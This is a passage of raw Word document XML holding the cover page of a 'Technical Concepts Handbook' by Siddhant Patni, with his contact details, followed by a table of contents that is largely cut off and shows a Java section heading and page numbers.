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CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F521E85" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1D0845" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A859EF5" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC26BD5" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCC5D1A" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024F709B" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7524FBAC" w14:textId="7A36EF66" w:rsidR="00432B90" w:rsidRPr="00CE4B95" w:rsidRDefault="003A781D" w:rsidP="00F42CEF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Technical Concepts Handbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA3FE7" w14:textId="36F361A7" w:rsidR="00DD0541" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD0541" w:rsidP="00F42CEF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Siddhant Patni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4754CC" w14:textId="676C702C" w:rsidR="00DD0541" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD0541" w:rsidP="00F42CEF">
      <w:pPr>
        <w:ind w:left="216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Mobile: +91-7588811796</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A31902D" w14:textId="10C16C82" w:rsidR="00A52AFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD0541" w:rsidP="00F42CEF">
      <w:pPr>
        <w:ind w:left="144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Email: siddhant4patni@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551423CA" w14:textId="77777777" w:rsidR="00432B90" w:rsidRPr="00CE4B95" w:rsidRDefault="00432B90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="006C086A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="34176F57" w14:textId="13C8CCE5" w:rsidR="00B502F6"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CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc197867214" w:history="1">
            <w:r w:rsidR="00B502F6" w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r w:rsidR="00B502F6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B502F6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B502F6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867214 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B502F6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B502F6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00B502F6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02173AB8" w14:textId="39D181E3"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215" w:history="1">
            <w:r w:rsidRPr="006E6F1F">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7867215 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50345DB7" w14:textId="3DA6B55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7867216 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03FC0A28" w14:textId="5E3BCB2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7867217 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="771E4E62" w14:textId="450B338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7867218 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60B20C19" w14:textId="46C7CD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7867219 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2986F6B9" w14:textId="3DF6A82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7867220 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39B3D04E" w14:textId="6C022D5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7867221 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="424B038C" w14:textId="4AE0083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7867222 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52D3E913" w14:textId="4975E70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7867223 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26A1683A" w14:textId="1DDD3ED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7867224 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1928493F" w14:textId="46FF536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7867225 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="398EB700" w14:textId="35399BF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7867226 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="330F4EEC" w14:textId="6722B42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7"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7867227 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D5377FE" w14:textId="31386CA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7867228 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="362F3752" w14:textId="54B0119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7867229 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C6A1BEE" w14:textId="44FC596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7867230 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DBE5CD1" w14:textId="7EA0FC7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ring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867231 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AFB9239" w14:textId="518666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7867232 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10255573" w14:textId="7632088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7867233 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="034BCDDC" w14:textId="3FFD854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7867234 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E25236D" w14:textId="232C79B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7867235 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41CCD069" w14:textId="3D89D03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7867236 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69642562" w14:textId="6BC357E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7"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7867237 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41FB0741" w14:textId="6783D1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7867238 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56521C9B" w14:textId="40D99A8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7867239 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="272057E7" w14:textId="3D92DF5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7867240 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ED8FA7C" w14:textId="6A9757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7867241 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="050E180E" w14:textId="4B3770E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7867242 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
